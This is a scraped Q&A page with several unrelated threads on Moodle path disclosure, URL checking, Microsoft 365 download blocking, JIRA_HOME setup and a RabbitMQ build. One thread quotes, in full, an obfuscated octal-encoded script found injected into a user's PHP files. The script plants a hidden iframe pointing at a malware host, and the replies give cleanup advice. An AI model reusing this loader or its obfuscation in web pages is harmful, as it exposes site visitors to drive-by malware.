A question about the result of a security audit - path
We have installed moodle on debian 10. A company specializing in security analyzed our moodle in order to find security vulnerabilities. Among the vulnerabilities found, there is one vulnerability which I cannot understand, I hope you can help me understand it. Here is the information about this vulnerability.
The vulnerability: Local filesystem
paths: Absolute filesystem path
Impacte: This information is sensitive, as it may reveal things about the server environment to an attacker.
Knowing filesystem layout can increase the chances of success for blind attacks.
Exploitation: Get/
lib/javascript.php/ /media/player/videojs/videojs/video-js.swf
Solution: Replace the absolute directory path with a hypertext link to the requested resource.
What I understood is that some files are accessible by their absolute path (example the video-js.swf file) but what I did not understand is what I have to do to solve the problem.
Do you have an idea?
Thank you in advance for your clarifications
Related
How to check the validity of all *.url files on my Win10 partition?
How to check the validity of all *.url files on my Win10 partition? In the past there was a tool AM-Deadlink which did this job. Unfortunately it uses very old internet explorer engine resp. does not offer *.url files checking from partition files any more. So I am seerching for another, newtool which helps me. It should: collect all *.url files from a given partition (e.g. D:) check if target webpage exists resp. exists only as re-direction ....and tell me the HTTP server return (error) code Any tool available? See above nothing more to explain
365 Block .exe Download
Is it possible to prevent the download and execution of files with a .exe extension using 365? I've searched across Endpoint Manager, Defender for Endpoint and Defender for Cloud Apps but can't see an obvious way of doing this. Most of my searches suggest using AppLocker but this would only solve half the problem (blocking execution of the file). Is there any way using Microsoft 365 technology to block the download and execution of files based on their extension?
You can try using Edge's relevant group policy or registry to achieve your needs. I think this should help you. Please refer to this policy document: Allow download restrictions. It can be known in the documentation that the danger level of exe type files is ALLOW_ON_USER_GESTURE, so you can change the group policy or registry information I mentioned above to 2, which will block potentially dangerous or unwanted downloads and dangerous file types. And the path of this registry is at: SOFTWARE\Policies\Microsoft\Edge\Recommended, if it doesn't exist, you can create it as REG_DWORD type, set its value will be ok. In the same way, you can do it via group policy.
Found This Hack in my web server php files
How did i get them and what can i do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#
It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.
Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data. If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded. If you have no CMS, change your FTP & control panel passwords. As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it. To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.
this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux). I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do. Many of my files were infected with something like: <?php #8f4d8e# ... #/8f4d8e# ?> I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system. If you have SSH access to the server go to your document root and search for all files containing the string: grep -R "#8f4d8e#" . You could also look for your version of the god.php file... look for traces of R57, for example by issuing: grep -R "R57" . Mine had a big ASCII art drawing of a bug at the beginning of the file. I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company). What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.
How to configure JIRA_HOME?
How to configure JIRA_HOME? I'm getting an error: Configured jira.home '/Users/codedroid/Downloads/atlassian-jira-5.1-standalone' must not be a parent directory of the webapp servlet path '/Users/codedroid/Downloads/atlassian-jira-5.1-standalone/atlassian-jira' Changed it and now I get this: Configured jira.home '/Users/codedroid/Downloads/atlassian-jira-5.1-standalone/atlassian-jira' must not be the same as the webapp servlet path '/Users/codedroid/Downloads/atlassian-jira-5.1-standalone/atlassian-jira'
Have a look in here, if you're still having troubles please write what did you set JIRA_HOME to be and where did you defined it, thanks. EDIT Yea, that documentation is more of 'how to' instead of 'what'. A better explanation of what the JIRA_HOME should be is writen in more details here. Anyway, if you feel that the documentation are confusing or just bad, you could do everyone a favour and write it at the bottom of the page, under comments, so other could see it easily.
The JIRA documentation does NOT! make it clear even to a seasoned programmer that this JIRA_HOME directory is referring to a data directory and not the installation directory. If there are any JIRA folks out there please fix this outragious misunderstanding in your documentation. JAVA_HOME refers to you guessed it the installation location of java. Its called a 'convention' if you want to invent some other meaning please say so it your documentation and don't wast valuable developer time on installing your productivity tool. Think its not a problem? Google 'must not be the same as the webapp servlet path' and see what you get back. Thanks for wasting my afternoon, and no doubt the time of many others. (warning) However, avoid locating the JIRA Home Directory inside the JIRA Installation Directory. This appears in only documentation point and is not the first place people look as noted above
Just create a folder named JIRA, then set the environment variable JIRA_HOME as D:\JIRA, as well as the application properties file. # jira-application.properties jira.home = D:\\JIRA Don't be confused with the JAVA_HOME, JIRA_HOME has absolutely nothing to do with the folder of your zip ball downloaded from official website.
JIRA_HOME is an empty folder where JIRA will create everything it needs in a RUNTIME. It is NOT a folder where your unpacked JIRA distribution resides. P.S. yes it is confusing still in 2021
Rabbitmq erlang client build failed due to file paths problems?
I have been able to build rabbitmq server on ubuntu linux. It came already prepackaged and on making, it is able to start as a service. When i got the client source, i failed to make because it appeared like it needed a folder called ./deps/rabbitmq-server. Analysing the code, i find that the author of the client was accessing the same header files as are found in the server, using include_lib("path to rabbit.hrl e.t.c") in his header file called "amqp_client.hrl". I then decided to add rabbitmq_server in the lib dir of erlang so as its paths are automatically added on start up of the vm. But still this didnot help. There is also another folder which the client references called "rabbit_common" for an include folder he assumes would contain all the .hrl files there. Please assist me in building both the client and server on my ubuntu server, for testing.
Also, if anyone has used RabbitMQ server for IMs, please provide some benchmarks and/or your findings on its throughput, speed and number of users. How can it be compared to ejabberd?. How can one create AJAX/Jquery/Javascript clients for Web functionality?
thanks
I hope you had made some progress as far as RabbitMQ and ejabberd are concerned. Below is a link to an interesting discussion that might be of help. http://old.nabble.com/AMPQ-vs-XMPP-and-RabbitMQ-vs-ejabberd-td17587109.html